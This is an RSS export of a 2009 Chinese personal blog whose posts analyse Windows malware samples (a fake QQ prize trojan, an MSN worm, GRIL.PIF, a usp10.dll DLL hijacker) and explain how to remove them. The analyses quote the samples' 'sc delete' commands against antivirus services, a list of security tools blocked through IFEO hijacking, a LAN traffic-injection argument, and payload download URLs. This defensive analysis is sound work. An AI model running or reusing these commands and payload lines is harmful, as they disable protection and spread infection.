<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[孤独更可靠_博客]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[平静，低调，生活。]]></description>
<link>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[关于最近QQ“收到好友声讯点歌”浅析]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/b568784ea6983500b2de0562.html]]></link>
        <description><![CDATA[
		
		<p>这类信息通常于手机端发送，且时间和声讯台号码具有不确定性，格式信息如下：</p>
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/6f34063869c6f10fb9998f3a.jpg"><br>
<span style="display: none; left: 273px; position: absolute; top: 610px" unselectable="true" outfunc="null" initialized="true" h="0" w="0" y="610" x="273"><img src="http://www.dehuaca.com/images/attachicons/attachimg.gif" border="0"></span></p>
<div class="t_attach" style="display: none; z-index: 50; filter: progid:DXImageTransform.Microsoft.shadow(direction=135,color=#CCCCCC,strength=2); left: 273px; clip: rect(auto auto auto auto); position: absolute; top: 610px" initialized="true" h="45" w="139" ctrlkey="attach_198336"><img class="absmiddle" src="http://www.dehuaca.com/images/attachicons/image.gif" border="0"><a href="http://www.dehuaca.com/attachment.aspx?attachmentid=198336" target="_blank"><strong>Snap1.jpg </strong></a>(16.16 K)<br>
<div class="t_smallfont">2009-8-31 11:14:28</div>
</div>
<p><br>
<br>
<br>
由于平台的约束，几乎排除手机病毒的可能，，</p>
<p><br>
我想应该是由PC端被获取的账号密码，经过一系列的处理（群登，群发），</p>
<p><br>
对傀儡号码里的好友列表发送&ldquo;声讯台点歌&rdquo;信息，当然，这只是个骗局。</p>
<p><br>
如果你不幸拨打了这些号码，那么也许有天会收到欠费单或定制业务的通知，呵呵，不要为此感到惊讶。</p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B2%BB%CE%F1%D5%FD%D2%B5%60%60">不务正业``</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/b568784ea6983500b2de0562.html#comment">查看评论</a>]]></description>
        <pubDate>2009-08-31  11:22</pubDate>
        <category><![CDATA[不务正业``]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/b568784ea6983500b2de0562.html</guid>
</item>

<item>
        <title><![CDATA[gdiplus.exe伪QQ中奖木马]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/770cc724a92fd6094c088d9f.html]]></link>
        <description><![CDATA[
		
		<p><strong>文件名称：</strong>gdiplus.exe</p>
<p><strong>文件大小：</strong>57899 字节</p>
<p><strong>病毒命名：</strong></p>
<p>BitDefender - - Gen:Trojan.Heur.3065153434</p>
<p>DrWeb - - BACKDOOR.Trojan</p>
<p>McAfee+Artemis - - Generic!Artemis</p>
<p><strong>加壳方式：</strong>ASPack</p>
<p><strong>编写语言：</strong>VB</p>
<p><strong>文件MD5：</strong>8a9e141947d940a08b44c58537323ec4</p>
<p><strong>病毒类型：</strong>流氓程序</p>
<p> </p>
<p><strong>1、释放文件：</strong></p>
<p>C:\WINDOWS\system32\gdiplus.exe 57899 字节</p>
<p><strong>2、查找注册表SOFTWARE\Tencent\QQ，获得当前QQ的完整路径，保存为：</strong></p>
<p>C:\WINDOWS\system32\Macromed\Flash\FlashPlayerTrust\下</p>
<p><strong>3、在QQ目录下生成隐藏文件：</strong></p>
<p>Program Files\Tencent\QQ\Wsock32.dll 53248 字节</p>
<p>Program Files\Tencent\QQ\syswsock32.dll 28,672 字节（系统文件）</p>
<p><font color="#ff0000">实现无启动项启动</font></p>
<p><a class="thickbox" jquery1240388234046="45" href="http://i43.tinypic.com/6t0g08.jpg"><img title="Click for a larger view" jquery1240388234046="2" src="http://i43.tinypic.com/6t0g08.jpg"></a></p>
<p><strong>4、当运行QQ时，位于Tencent\QQ\Wsock32.dll由于目录优先性，代替系统文件被加载。</strong></p>
<p>随后启动病毒C:\WINDOWS\system32\gdiplus.exe</p>
<p>最后再注入syswsock32.dll</p>
<p><a class="thickbox" jquery1240388234156="45" href="http://i42.tinypic.com/140kjq.jpg"><img title="Click for a larger view" jquery1240388234156="2" src="http://i42.tinypic.com/140kjq.jpg"></a></p>
<p><strong>5、病毒运行后在任务管理器可见，访问网络221.1.74.165</strong></p>
<p>更新钓鱼面板信息：</p>
<p>0~1,0,0,1,0~5,0,6~0,0,0~恭喜!您的QQ号码已成功被RGB(255,0,0)后台系统随机抽选为当日在RGB(255,0,0)线&ldquo;二等奖&rdquo;用户,请您及时RGB(255,0,0)领取您的奖项.验证码[1686]RGB(255,0,0)^http://tenglong101.cn/tupian/qq2.bmp^http://www.qqsvm.cn/~^~~系统广播：RGB(0,0,0)庆祝腾讯QQ 10周岁感谢广大用户的支持!公司将邀请RGB(0,0,0)到赞助商三星(公司)在线举办&ldquo;十周年庆典挖宝活动&rdquo;RGB(0,0,0)恭喜!您已被抽选成为《二等奖》幸运用户验证码:1686RGB(0,0,255) 此次活动最终解释权归深圳腾讯公司所有RGB(0,0,0)^http://www.qqsvm.cn/~~1001~十周年庆典挖宝活动~0</p>
<p><strong>6、开始弹广告....</strong></p>
<p><a class="thickbox" jquery1240388235265="45" href="http://i41.tinypic.com/ajvtzr.jpg"><img title="Click for a larger view" jquery1240388235265="2" src="http://i41.tinypic.com/ajvtzr.jpg"></a></p>
<p>（拜托..还没登入就开始弹...留点回忆好不好）</p>
<p>点击进入后发现是个钓鱼网，</p>
<p>大概内容是恭喜您获得XX奖（反正听起来是个很牛逼奖项...），，</p>
<p>然后请您汇款XX元到XX处给这个病毒作者凑棺材费.... - -!</p>
<p>最烦人的就是这个gdiplus.exe处于活动状态的时候会不时跳出这个面板</p>
<p>关都关的烦厌</p>
<p><font color="#0000ff" size="5"><strong>其实清除起来也不难：</strong></font></p>
<p><strong>1、懒点的就重装下QQ，记得别放在以前安装QQ的那个盘。</strong></p>
<p><font color="#ff0000">重启后解决</font>（PS：旧的QQ快捷方式要先删掉）</p>
<p><strong>2、删除文件：C:\WINDOWS\system32\gdiplus.exe</strong></p>
<p><font color="#ff0000">重启后世界清净....</font></p>
<p><strong>3、完整删除：</strong></p>
<p><strong>（1）暂时关闭QQ（开几个关几个），打开任务管理器，结束进程gdiplus.exe</strong></p>
<p><strong>（2）打开任意文件夹，选择&ldquo;工具-文件夹选项&rdquo;，勾选&ldquo;显示所有文件和文件夹&rdquo;，取消&ldquo;隐藏受系统保护的文件&rdquo;</strong></p>
<p><strong>（3）现在病毒就无处遁形了，删除文件：</strong></p>
<p>C:\WINDOWS\system32\gdiplus.exe</p>
<p><strong>QQ目录下的：</strong></p>
<p>Program Files\Tencent\QQ\Wsock32.dll</p>
<p>Program Files\Tencent\QQ\syswsock32.dll</p>
<p><font color="#ff0000">重启计算机，问题解决...</font></p>
<p><font color="#ff0000"><a class="thickbox" jquery1240389027062="44" href="http://i41.tinypic.com/6f9mdd.jpg"><img title="Click for a larger view" jquery1240389027062="2" src="http://i41.tinypic.com/6f9mdd.jpg"></a></font></p>
<p> </p>
<p><font color="#ff0000" size="4"><strong>PS:如上述方法无法清除，麻烦把gdiplus.exe用Winrar压缩发送到</strong></font></p>
<p><a href="mailto:Lyhan_1988@163.com"><font color="#ff0000" size="4"><strong>Lyhan_1988@163.com</strong></font></a><font color="#ff0000" size="4"><strong>或</strong></font><a href="mailto:526170722@qq.com"><font color="#ff0000" size="4"><strong>526170722@qq.com</strong></font></a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B2%BB%CE%F1%D5%FD%D2%B5%60%60">不务正业``</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/770cc724a92fd6094c088d9f.html#comment">查看评论</a>]]></description>
        <pubDate>2009-04-22  17:05</pubDate>
        <category><![CDATA[不务正业``]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/770cc724a92fd6094c088d9f.html</guid>
</item>

<item>
        <title><![CDATA[MSN病毒]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f1199231cec449a05edf0e8d.html]]></link>
        <description><![CDATA[
		
		<p><font size="4">没什么改变，贴图说话</font></p>
<p><strong>文件图标：</strong></p>
<p><strong><a class="thickbox" href="http://i44.tinypic.com/24dok5f.jpg" jquery1240309701171="45"><img title="Click for a larger view" src="http://i44.tinypic.com/24dok5f.jpg" jquery1240309701171="2"></a></strong></p>
<p> </p>
<p><strong>运行后弹出对话框，迷惑中毒用户：</strong></p>
<p><strong><a class="thickbox" href="http://i40.tinypic.com/2r5yp05.jpg" jquery1240309794953="44"><img title="Click for a larger view" src="http://i40.tinypic.com/2r5yp05.jpg" jquery1240309794953="2"></a></strong></p>
<p><strong>添加启动项，连接radiofm24.info，在任务管理器可见：</strong></p>
<p><a class="thickbox" href="http://i43.tinypic.com/21eqbyd.jpg" jquery1240308374640="45"><img title="Click for a larger view" src="http://i43.tinypic.com/21eqbyd.jpg" jquery1240308374640="2"></a></p>
<p> </p>
<p><strong>修改主页：</strong></p>
<p><strong><a class="thickbox" href="http://i43.tinypic.com/2e4w8s8.jpg" jquery1240309928906="45"><img title="Click for a larger view" src="http://i43.tinypic.com/2e4w8s8.jpg" jquery1240309928906="2"></a></strong></p>
<p> </p>
<p><strong><font color="#ff0000" size="5">解决方法：</font></strong></p>
<p><strong>删除启动项<font color="#ff0000">Windows pack Control Center</font>：</strong></p>
<p><strong><a class="thickbox" href="http://i39.tinypic.com/23wtn5e.jpg" jquery1240309933890="45"><img class="imgsize" title="Click for a larger view" src="http://i39.tinypic.com/23wtn5e.jpg" jquery1240309933890="2"></a></strong></p>
<p> </p>
<p><strong>重启计算机，问题解决，建议修改MSN密码。</strong></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B2%BB%CE%F1%D5%FD%D2%B5%60%60">不务正业``</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f1199231cec449a05edf0e8d.html#comment">查看评论</a>]]></description>
        <pubDate>2009-04-21  18:38</pubDate>
        <category><![CDATA[不务正业``]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f1199231cec449a05edf0e8d.html</guid>
</item>

<item>
        <title><![CDATA[GRIL.PIF]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d842e480070276df9123d91b.html]]></link>
        <description><![CDATA[
		
		<p><br>
<strong>文件名称：</strong>GRIL.PIF</p>
<p><strong>文件大小：</strong>30208 bytes</p>
<p><strong>病毒命名：</strong></p>
<p>Kaspersky 7.0.0.125 2009.04.19 Worm.Win32.AutoRun.fpb</p>
<p>BitDefender 7.2 2009.04.18 Gen:Trojan.Heur.1024456363</p>
<p>Symantec 1.4.4.12 2009.04.19 Trojan.KillAV</p>
<p><strong>加壳方式：</strong>PE_Patch.UPX</p>
<p><strong>文件MD5：</strong>cbda45b0fd2a779dddbd8a4807a6be6c</p>
<p><font color="#3366ff" size="4"><strong>行为：</strong></font></p>
<p><strong>1、启动时查找互斥体&ldquo;AS21a669aSSE&rdquo;，有则退出进程，防止多个病毒体被运行</strong></p>
<p><strong>2、释放文件：</strong></p>
<p>C:\WINDOWS\Fonts\svchost.exe 11776 字节<br>
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节</p>
<p>C:\WINDOWS\system32\36osafe.exe, 13531 字节<br>
C:\WINDOWS\system32\isb.ini = 141 字节 (病毒下载列表)</p>
<p>C:\WINDOWS\system32\LINKINFO.dll（主体）</p>
<p><strong>3、调用cmd /c sc delete avp命令，删除卡巴斯基服务</strong></p>
<p><strong>4、连接网络：</strong><a href="http://a.wuc9.com/tt.txt"><strong>http://a.wuc9.com/tt.txt</strong></a><strong>保存至C:\WINDOWS\system32\isb.ini，下载其他流氓程序！</strong></p>
<p><strong>5、修改IFEO，启动重定向劫持，屏蔽常见的安全工具</strong></p>
<p>360rpt.EXE <br>
360safe.EXE <br>
360safebox.EXE <br>
360tray.EXE <br>
ANTIARP.EXE <br>
ArSwp.EXE <br>
Ast.EXE <br>
AutoRun.EXE <br>
AutoRunKiller.EXE <br>
AvMonitor.EXE <br>
AVP.COM <br>
AVP.EXE <br>
CCenter.EXE <br>
Frameworkservice.EXE <br>
GFUpd.EXE <br>
GuardField.EXE <br>
HijackThis.EXE <br>
IceSword.EXE <br>
Iparmor.EXE <br>
KASARP.EXE <br>
kav32.EXE <br>
KAVPFW.EXE <br>
kavstart.EXE <br>
kissvc.EXE <br>
kmailmon.EXE <br>
KPfwSvc.EXE <br>
KRegEx.EXE <br>
KVMonxp.KXP <br>
KVSrvXP.EXE <br>
KVWSC.EXE <br>
kwatch.EXE <br>
Mmsk.EXE <br>
Navapsvc.EXE <br>
nod32krn.EXE <br>
Nod32kui.EXE <br>
PFW.EXE <br>
QQDoctor.EXE <br>
RAV.EXE <br>
RavMon.EXE <br>
RavMonD.EXE <br>
Ravservice.EXE <br>
RavStub.EXE <br>
RavTask.EXE <br>
RAVTRAY.EXE <br>
Regedit.EXE <br>
rfwmain.EXE <br>
rfwProxy.EXE <br>
rfwsrv.EXE <br>
Rfwstub.EXE <br>
RsAgent.EXE <br>
Rsaupd.EXE <br>
RsMain.EXE <br>
rsnetsvr.EXE <br>
RSTray.EXE <br>
Runiep.EXE <br>
safeboxTray.EXE <br>
ScanFrm.EXE <br>
SREngLdr.EXE <br>
TrojanDetector.EXE <br>
Trojanwall.EXE <br>
TrojDie.KXP <br>
VPC32.EXE <br>
VPTRAY.EXE <br>
WOPTILITIES.EXE</p>
<p><strong>5、查找窗口，发现以下文字则会被关闭：</strong></p>
<p>essact<br>
egui<br>
RavTray<br>
ccApp<br>
vptray<br>
KavStart<br>
360Safebox<br>
360Safetray<br>
AfxControlBar42s<br>
IceSword<br>
SYSTEM<br>
杀毒&nbsp;&nbsp;&nbsp;  <br>
清理<br>
SREng<br>
超级巡警<br>
金山<br>
Anti<br>
Mcafee<br>
狙剑<br>
主动防御<br>
微点<br>
绿鹰<br>
主动<br>
上报<br>
举报<br>
瑞星<br>
NOD32<br>
拦截<br>
监控<br>
安全卫士<br>
监视</p>
<p>冰刃的关闭方式是向退出时的确认框发送&ldquo;是&rdquo;消息，关闭冰刃。</p>
<p><strong>6、查找可用的磁盘，在目录下拷贝病毒为autorun.inf和GRIL.PIF</strong></p>
<p>并每隔一段时间查找可用磁盘，完成移动盘感染</p>
<p><strong>7、时隔5秒为周期，以递增方式访问192.168.0.1至192.168.0.100IP段，应该是局域传播</strong></p>
<p>由于测试局限性，该行为未实现。</p>
<p><strong>8、调用CMD，删除服务：</strong></p>
<p>cmd.exe /c sc delete ekrn<br>
cmd.exe /c sc delete RsRavMon<br>
cmd.exe /c sc delete RavTask<br>
cmd.exe /c sc delete RsScanSrv<br>
cmd.exe /c sc delete RavCCenter</p>
<p>重启后诺顿和瑞星报销</p>
<p><strong>9、还有这些服务也会被禁用：</strong></p>
<p>Norton AntiVirus Server<br>
McAfee Framework <br>
Symantec AntiVirus Definition Watcher<br>
Symantec AntiVirus Drivers Services<br>
Norton AntiVirus<br>
norton AntiVirus server<br>
Kingsoft Internet Security Common Service</p>
<p><strong>10、启动另一个线程：C:\WINDOWS\system32\36osafe.exe（注意是36O不是360）</strong></p>
<p>在192.168.203.2-192.168.203.254的数据包内加入一个框架，参数为：</p>
<p>-idx 0 -ip 192.168.203.2-192.168.203.254 -port 80 -insert &quot;&lt;script language=javascript src=hxxp://%33%36%30%2E%63%64%64%31%2E%63%6F%6D/lg.js&gt;&lt;/script&gt;&quot;</p>
<p>解密后hxxp://360.cdd1.com/lg.js</p>
<p>相继连接以下站点：</p>
<p><br>
hxxp://371gw.com/pai/ll.htm<br>
hxxp://371gw.com/pai/4.htm<br>
hxxp://371gw.com/pai/1.js<br>
hxxp://371gw.com/pai/all.js<br>
hxxp://371gw.com/pai/1.htm<br>
hxxp://371gw.com/pai/ie.swf<br>
hxxp://371gw.com/pai/all.htm<br>
hxxp://371gw.com/pai/ll.htm</p>
<p>crypthtml和unescape、shellcode的混合加密<br>
有Real，Flash，Ms0614等漏洞</p>
<p>下载的病毒跟这个一样！</p>
<p><strong>11、删除以下注册表键值破坏安全模式：</strong></p>
<p>SYSTEM\CurrentControlSet\Control\SafeBoot\Network<br>
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal</p>
<p><strong>12、修改注册表</strong>：</p>
<p>SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\advanced\folder\hidden\showall</p>
<p>使隐藏文件不显示，保护病毒文件</p>
<p><strong><font color="#ff0000" size="5">简单的解决方法：</font></strong></p>
<p><strong>1、下载SREng，删除启动：</strong></p>
<p>[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]<br>
&nbsp;&nbsp;&nbsp;  &lt;360safe&gt;&lt;C:\WINDOWS\Fonts\wuauclt.exe&gt; []</p>
<p><strong>SREng能检测到的所有IFEO键值</strong></p>
<p>[lfdl / lfdl][Stopped/Manual Start]<br>
&lt;\??\C:\WINDOWS\fonts\lfdl.sys&gt;&lt;N/A&gt;</p>
<p><br>
[nbkkt / nbkkt][Stopped/Manual Start]<br>
&lt;\??\C:\WINDOWS\Fonts\nbkkt.fon&gt;&lt;N/A&gt;</p>
<p>[acpidisk / acpidisk][Running/Auto Start]<br>
&lt;\??\C:\WINDOWS\system32\drivers\acpidisk.sys&gt;&lt;N/A&gt;</p>
<p>pnpmem驱动</p>
<p><strong>2、重启计算机，删除文件：</strong></p>
<p>C:\WINDOWS\Fonts\svchost.exe 11776 字节<br>
C:\WINDOWS\Fonts\wuauclt.exe 20480 字节<br>
C:\WINDOWS\system32\36osafe.exe, 13531 字节<br>
C:\WINDOWS\system32\LINKINFO.dll</p>
<p><strong>3、全部删除后解决，电脑可正常使用！</strong></p>
<p><a class="thickbox" jquery1240185598281="45" href="http://i42.tinypic.com/b7m2iw.jpg"><img class="imgsize" title="Click for a larger view" jquery1240185598281="2" src="http://i42.tinypic.com/b7m2iw.jpg"></a></p>
<p> </p>
<p><a class="thickbox" jquery1240185601390="45" href="http://i43.tinypic.com/npkygx.jpg"><img title="Click for a larger view" jquery1240185601390="2" src="http://i43.tinypic.com/npkygx.jpg"></a></p>
<p> </p>
<p><a class="thickbox" jquery1240185602187="44" href="http://i42.tinypic.com/3442fpk.jpg"><img class="imgsize" title="Click for a larger view" jquery1240185602187="2" src="http://i42.tinypic.com/3442fpk.jpg"></a></p>
<p> </p>
<p><img src="http://i43.tinypic.com/30a760z.jpg"></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B2%BB%CE%F1%D5%FD%D2%B5%60%60">不务正业``</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d842e480070276df9123d91b.html#comment">查看评论</a>]]></description>
        <pubDate>2009-04-20  09:31</pubDate>
        <category><![CDATA[不务正业``]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d842e480070276df9123d91b.html</guid>
</item>

<item>
        <title><![CDATA[这样的“修改”主页方式太猥琐]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f52ad3fa38ef9ed6b58f3167.html]]></link>
        <description><![CDATA[
		
		<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/cc3365fb50be1746034f56d6.jpg"></p>
<p> </p>
<p>自己一直使用的是非IE浏览器，今天才发现自己主页被修改了，我想应该是上次下载的游戏所导致的！</p>
<p>嘿嘿，，以前见过的是在快速启动栏里对IE做手脚，也是一样的参数，现在高科技了阿，</p>
<p>在clsid的IE键值里&ldquo;追尾&rdquo;，哈哈哈，，，，，</p>
<p>进入注册表，搜索被修改的主页名称，例如：&ldquo;<a href="http://www.xxxx.com/">Http://www.XXXX.com</a>&rdquo;</p>
<p>搜索到如下键值：</p>
<p>&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; <a href="http://www.xxxx.com/">Http://www.XXXX.com</a></p>
<p>修改为&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot;</p>
<p>嘿嘿，重启IE，问题解决</p>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%B2%BB%CE%F1%D5%FD%D2%B5%60%60">不务正业``</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f52ad3fa38ef9ed6b58f3167.html#comment">查看评论</a>]]></description>
        <pubDate>2009-04-15  08:08</pubDate>
        <category><![CDATA[不务正业``]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f52ad3fa38ef9ed6b58f3167.html</guid>
</item>

<item>
        <title><![CDATA[usp10.dll...]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d842e4807d8fc8d09123d99f.html]]></link>
        <description><![CDATA[
		
		<p>usp10.dll的载体是：gr.exe。</p>
<p>这病毒有点诡异，，可能是因为防止在虚拟机被调试</p>
<p>我测试的时候磕磕碰碰，现下简单分析：</p>
<p> </p>
<p><strong>一、首先运行gr.exe，没动静（任务管理器可见）...没有任何作为。</strong></p>
<p><strong>二、释放文件：</strong></p>
<p>%Systemroot%\system32\sadfasdf.jpg  1198 字节</p>
<p>其实不是图片格式，是一个病毒列表，用文本方式打开为：</p>
<p>en=y<br>
url1=http://www.dwjxn.com/new/new1.exe<br>
url2=http://www.dwjxn.com/new/new2.exe<br>
url3=http://www.dwjxn.com/new/new3.exe<br>
url4=http://www.dwjxn.com/new/new4.exe<br>
url5=http://www.dwjxn.com/new/new5.exe<br>
url6=http://www.dwjxn.com/new/new6.exe<br>
url7=http://www.dwjxn.com/new/new7.exe<br>
url8=http://www.dwjxn.com/new/new8.exe<br>
url9=http://www.dwjxn.com/new/new9.exe<br>
url10=http://www.dwjxn.com/new/new10.exe<br>
url11=http://www.dwjxn.com/new/new11.exe<br>
url12=http://www.dwjxn.com/new/new12.exe<br>
url13=http://www.dwjxn.com/new/new13.exe<br>
url14=http://www.dwjxn.com/new/new14.exe<br>
url15=http://www.dwjxn.com/new/new15.exe<br>
url16=http://www1.dwjxn.com/new/new16.exe<br>
url17=http://www1.dwjxn.com/new/new17.exe<br>
url18=http://www1.dwjxn.com/new/new18.exe<br>
url19=http://www1.dwjxn.com/new/new19.exe<br>
url20=http://www1.dwjxn.com/new/new20.exe<br>
url21=http://www1.dwjxn.com/new/new21.exe<br>
url22=http://www1.dwjxn.com/new/new22.exe<br>
url23=http://www1.dwjxn.com/new/new23.exe<br>
url24=http://www1.dwjxn.com/new/new24.exe<br>
url25=http://www1.dwjxn.com/new/new25.exe<br>
url26=http://www1.dwjxn.com/new/new26.exe<br>
url27=http://www1.dwjxn.com/new/new27.exe<br>
url28=http://www1.dwjxn.com/new/new28.exe</p>
<p> </p>
<p><font color="#ff0000">都是病毒，，别点啊，，，</font></p>
<p> </p>
<p>%Systemroot%\Tasks\1 7168 字节</p>
<p>也就是usp10.dll...</p>
<p><strong>三、查找除系统盘外的可执行文件，在其目录下生成usp10.dll...属性为隐藏。</strong></p>
<p>那么在运行程序的时候，会先调用目录下的usp10.dll...</p>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/efa88ac2b1eca8040ff4772a.jpg"></div>
<p> </p>
<p><strong>四、当假usp10.dll被程序加载的时候，首先查找互斥体，有则退出。</strong></p>
<p>最后加载正常的usp10.dll文件。</p>
<p><strong>五、连接网络：</strong><a href="http://www.hoho-3.cn/down/gr.exe"><strong>http://www.hoho-3.cn/down/gr.exe</strong></a><strong>，这里应该是最新的版本</strong></p>
<p>然后添加注册表至PendingFileRenameOperations，延迟删除旧的病毒文件！</p>
<p><strong>六、修改注册表，破坏显示隐藏文件：</strong></p>
<p>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Hidden<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  REG_DWORD, 1 ==&gt; REG_DWORD, 2<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ShowSuperHidden<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  REG_DWORD, 1 ==&gt; REG_DWORD, 0</p>
<p><strong>七、注册一个空服务，隐藏文件：%Systemroot%\Tasks\1</strong></p>
<p>当服务存在的时候，%Systemroot%\Tasks\1不能用于文件浏览</p>
<p>但是Acdsee、Winrar和冰刃之类的软件可以发觉该文件！</p>
<p><strong>八、再联网...：</strong><a href="http://txt.kadwo.com/oo.txt"><strong>http://txt.kadwo.com/oo.txt</strong></a></p>
<p>疯狂下载木马，，一共有28个，都是盗号的木马！</p>
<p> </p>
<p>因为主体没有正常运行，所以删除usp10.dll相对比较容易</p>
<p><strong>1、打开注册表（Regedit），删除这个服务：LEGACY_IO</strong></p>
<p>如果无法删除的话，右键，，，设置权限，，，</p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/1efa89ef4824e609fdfa3cff.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/64c81fada7af0d164b36d6f8.jpg"></p>
<p> </p>
<p><strong>2、删除文件：</strong></p>
<p>%Systemroot%\Tasks\1 7168 字节</p>
<p>%Systemroot%\system32\sadfasdf.jpg  1198 字节</p>
<p><strong>3、搜索文件，关键字：&ldquo;usp10&rdquo;</strong></p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/b964e2bfcfc6fb1519d81fc7.jpg"></p>
<p> </p>
<p>注意%Systemroot%\system32\和%Systemroot%\system32\dllcache下的usp10.dll别删除</p>
<p>其他的全部删除，，都是7KB的撒，，，，</p>
<p> </p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/a0a9ff43481faa0c73f05dd4.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/a2bc4b386e81ea3c97ddd8d6.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/pic/item/2b2a43227d1d5bbb4623e8d7.jpg"></p>
<p> </p>
<p>估计这东西还会再更新，，等啥时有空了，，再去看看....</p>
<p>欢迎提供样本：<a href="mailto:Lyhan1988@163.com">Lyhan1988@163.com</a>,加密virus</p>
<p> </p>
</div>
</div>
</div>
</div>
</div>
</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/category/%D4%AD%B4%B4%28%B2%A1%B6%BE%B7%D6%CE%F6%29%60%60%60">原创(病毒分析)```</a>&nbsp;<a href="http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d842e4807d8fc8d09123d99f.html#comment">查看评论</a>]]></description>
        <pubDate>2009-02-01  19:41</pubDate>
        <category><![CDATA[原创(病毒分析)```]]></category>
        <author><![CDATA[孤独更可靠]]></author>
		<guid>http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/d842e4807d8fc8d09123d99f.html</guid>
</item>

<item>
        <title><![CDATA[javqhc ？？？]]></title>
        <link><![CDATA[http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/ff361e4ecf63d4ccd1c86adb.html]]></link>
